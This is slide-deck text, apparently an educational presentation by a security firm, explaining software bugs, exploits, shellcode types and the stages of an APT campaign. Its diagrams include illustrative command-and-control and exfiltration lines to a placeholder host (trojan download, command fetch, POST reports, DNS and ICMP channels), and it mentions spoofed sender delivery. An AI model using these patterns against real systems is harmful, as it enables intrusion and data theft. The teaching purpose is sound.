Embed Size (px)
Citation preview
Rafel Ivgi
Defensia
1
What is a Software bug?
• A software bug is an error, flaw, mistake, failure,
or fault in a computer program
• A bug produces an incorrect or unexpected
result, or causes it to behave in unintended ways.
• Most bugs arise from mistakes and errors made
by people in either a program's source code or its
design
2
What is a Security bug?
• A security bug or security defect is a software bug that benefitssomeone other than intended beneficiaries in the intendedways.
• Security bugs introduce security vulnerabilities by compromisingone or more of:
– Authentication of users and other entities
– Authorization of access rights and privileges
– Data confidentiality
– Data integrity
• Security bugs generally fall into a fairly small number of broadcategories that include:
– Memory safety (e.g. buffer overflow and dangling pointer bugs)
– Race condition
– Secure input and output handling
– Faulty use of an API
– Improper use case handling
– Improper exception handling
3
How does a security bug look?
4
How do hackers find security bugs?
• Reversing Software Code To Read it in assembly
OR
Fuzzing Software
– Discovering 0-Days bugs/vulnerabilities
(only they have it)
• Reversing Security Updates (Bin-Diff)
– Discovering 1-Days bugs/vulnerabilities
(they become the first to be able to exploit the
vulnerability)
5
The same windows code: Before
vs. After the Security Patch
6
What is a Computer/Cyber Exploit?
• Digital Weapon
• A small piece of code to activate a bug in
software
• Once bug is activated, small piece of processor
code (assembly code) runs (AKA Shell-Code)
• Shell-Code usually downloads a Trojan or adds a
local admin user or connects back a cmd.exe to
the attacker
7
How does an exploit code look?
8
What is a Shell Code?
• A small piece of code used as the payload in the
exploitation of a software vulnerability
• It is called "shellcode" because it typically starts a
command shell (cmd.exe, /bin/sh) from which the
attacker can control the compromised machine
• Any piece of code that performs a similar task can be
called shellcode. Because the function of a payload is
not limited to merely spawning a shell
• Shellcode is commonly written in machine code
(assembly)
9
How does a shellcode look?
10
What are the common shellcodes?
• Bind Shell
• Reverse Shell
• Download & Execute
• Listen to VNC
• Reverse VNC Connection
• The latest: Download & LoadLibrary
11
What is a Cyber Attack?
(Usage Of Cyber Exploits)
• Physical Attack
• Local Network Attack
• Bridged/Routed Network Attack
• Remote Attack
12
What is an APT
(Advanced Persistent Threat )
• APT usually refers to a group, such as a foreign
government, with both the capability and the intent to
persistently and effectively target a specific entity
• The term is commonly used to refer to cyber threats, in
particular that of Internet-enabled espionage using a
variety of intelligence gathering techniques to access
sensitive information
• Recognized attack vectors include infected media,
supply chain compromise, and social engineering.
Individuals
13
Any Attack vs. an APT
• Regular/Random/Opportunistic/Targeted Cyber
Attack
– Widespread (SPAM Email etc.)
– Can be anyone (Kid, Basic Cyber Criminal, IP Scanning
Robot etc.)
– One/Two time attack/attempts
• APT – Advanced Persistent Threat
– Top Of The Line / World-Class Hacking Exploits & Tools
– Government or Organized Crime
– The target is attacked for at least 2-3 years
– If caught and cleaned, will usually attack again with a
different “face” and tools
14
APT - How Does It Work?
Penetration
Spreading
Aggregating Data &
Identifying Exit Routes
Sending Data Out Covertly
Maintaining Remote Access
OR Self-Destruct
15
File or Link coming from
Email,
Facebook, LinkedIn,
Tactical Wi-Fi
Network
Exploits, USB,
Shared Drives,
Internal Emails
Try: https://home.com/
Try: udp://home.com/
Try: icmp://home.com/
Try: dns://home.com/
POST https://home.com/report?id=100
Update Trojans,
Exploits, Bypass
Techniques
Penetration: 0-Day Usage Statistics
16
Penetration
17
Penetration: How Does It Work?
Research How To Approach The Target
Deliver Custom Made Content
To Target
Target Opens Content And Downloads
Trojan
Trojan Calls Home And Download
Commands
Data Retrieved & Analyzed
18
Email,
Facebook,
LinkedIn,
Tactical Wi-Fi
File,
Web Link,
SMS/Email
https://home.com/trojan.exehttps://home.com/get_cmds?id=100
Decrypt, Unzip,
Database, Archive
Research How To Approach The
Target
19
Research How To Approach The
Target
20
How Does It Work?
Research How To Approach The Target
Deliver Custom Made Content
To Target
Target Opens Content And Downloads
Trojan
Trojan Calls Home And Download
Commands
Data Retrieved & Analyzed
21
Email,
Facebook,
LinkedIn,
Tactical Wi-Fi
File,
Web Link,
SMS/Email
https://home.com/trojan.exehttps://home.com/get_cmds?id=100
Decrypt, Unzip,
Database, Archive
Deliver Custom Made Content To
Target - Untraceable Spoofed SMS Sender
22
Deliver Custom Made Content To
Target - Untraceable Spoofed Email Sender
23
Deliver Custom Made Content To
Target - Untraceable Spoofed Email Sender
24
How Does It Work? (Zoom-Out)
Research How To Approach The Target
Deliver Custom Made Content
To Target
Target Opens Content And Downloads
Trojan
Trojan Calls Home And Download
Commands
Data Retrieved & Analyzed
25
Email,
Facebook,
LinkedIn,
Tactical Wi-Fi
File,
Web Link,
SMS/Email
https://home.com/trojan.exehttps://home.com/get_cmds?id=100
Decrypt, Unzip,
Database, Archive
How Does It Work? (Zoom-In)
26
Attacker Discovers Exploit
Attacker Delivers the attack code to the target(Email Attachment, Link)
Victim opens the attacking content
Victim's Application executes code (Word,
Adobe, Flash, IE)
Attacking code (shellcode) uses an
exploitation technique
Malicious code executes and Trojan Installed
Target Opens Content And
Downloads Trojan
27
Target Opens Content And Downloads
Trojan – Closing Adobe, Shell-code Executes
(calc “plays” the invisible Trojan)
28
How Do Top Professionals Do It?
29
How Does It Work?
Research How To Approach The Target
Deliver Custom Made Content
To Target
Target Opens Content And Downloads
Trojan
Trojan Calls Home And Download
Commands
Data Retrieved & Analyzed
30
Email,
Facebook,
LinkedIn,
Tactical Wi-Fi
File,
Web Link,
SMS/Email
https://home.com/trojan.exehttps://home.com/get_cmds?id=100
Decrypt, Unzip,
Database, Archive
Trojan Calls Home And Download
Commands
31
Trojan Calls Home And Download
Commands
32
How Does It Work?
Research How To Approach The Target
Deliver Custom Made Content
To Target
Target Opens Content And Downloads
Trojan
Trojan Calls Home And Download
Commands
Data Retrieved & Analyzed
33
Email,
Facebook,
LinkedIn,
Tactical Wi-Fi
File,
Web Link,
SMS/Email
https://home.com/trojan.exehttps://home.com/get_cmds?id=100
Decrypt, Unzip,
Database, Archive
Data Retrieved & Analyzed
34
Data Retrieved & Analyzed
35
Spreading - How Does It Work?
Penetration
Spreading
Aggregating Data &
Identifying Exit Routes
Sending Data Out Covertly
Maintaining Remote Access
OR Self-Destruct
36
File or Link coming from
Email,
Facebook, LinkedIn,
Tactical Wi-Fi
Network
Exploits, USB,
Shared Drives,
Internal Emails
Try: https://home.com/
Try: udp://home.com/
Try: icmp://home.com/
Try: dns://home.com/
POST https://home.com/report?id=100
Update Trojans,
Exploits, Bypass
Techniques
Spreading – Network Exploits
37
Spreading – Network Shares
38
Spreading – USB Drives
39
